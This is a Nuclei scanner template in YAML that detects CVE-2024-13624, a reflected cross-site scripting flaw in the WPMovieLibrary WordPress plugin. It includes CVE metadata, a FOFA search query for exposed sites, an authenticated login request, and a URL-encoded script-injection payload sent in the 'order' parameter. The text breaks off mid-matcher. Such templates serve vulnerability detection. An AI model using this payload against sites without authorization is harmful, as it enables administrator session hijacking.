id: CVE-2024-13624 info: name: WordPress WPMovieLibrary Plugin <= 2.1.4.8 - Cross-Site Scripting author: ritikchaddha severity: high description: | The WPMovieLibrary WordPress plugin through version 2.1.4.8 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape the 'order' parameter in the import page before outputting it back, which could allow attackers to execute arbitrary JavaScript code in an administrator's browser context. impact: | Authenticated attackers can execute arbitrary JavaScript in an administrator's browser context via the order parameter, potentially leading to session hijacking or privilege escalation. remediation: | Update WPMovieLibrary plugin to a version newer than 2.1.4.8. reference: - https://wpscan.com/vulnerability/c19b56cc-634f-420f-b6a0-9a10ad159049 - https://nvd.nist.gov/vuln/detail/CVE-2024-13624 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N cvss-score: 7.1 cve-id: CVE-2024-13624 cwe-id: CWE-79 epss-score: 0.00654 epss-percentile: 0.46608 metadata: verified: true max-request: 2 product: wpmovielibrary fofa-query: body="wp-content/plugins/wpmovielibrary/" tags: cve,cve2024,wp,wordpress,wp-plugin,xss,wpmovielibrary,authenticated,vuln flow: http(1) && http(2) http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} redirects: true matchers: - type: word part: body words: - 'wpmovielibrary' internal: true - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | GET /wp-admin/admin.php?page=wpmovielibrary-import&order=1%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cscript%3E HTTP/1.1 Host: {{Hostname}} cookie-reuse: true matchers-condition: and matchers: - type: word part: body words: - '">